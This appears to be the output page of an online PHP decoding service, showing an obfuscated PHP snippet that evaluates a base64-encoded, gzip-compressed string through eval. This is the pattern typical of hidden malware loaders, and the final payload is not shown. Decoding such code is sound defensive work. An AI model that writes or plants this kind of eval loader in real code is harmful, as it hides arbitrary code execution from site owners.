Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3..
Decoded Output download
<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==";
$stt0 = "==wmJUqmA0O7V0a1SN18TGHAS1yLM/IUXhszNhEUog8LxOLn49P3AMSA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>
Did this file decode correctly?
Original Code
<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
$stt0 = "==wmJUqmA0O7V0a1SN18TGHAS1yLM/IUXhszNhEUog8LxOLn49P3AMSA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
htmlspecialchars_decode | 1 |
Stats
MD5 | 999e1127ae18f17a7d721e9cb46d2b7b |
Eval Count | 0 |
Decode Time | 51 ms |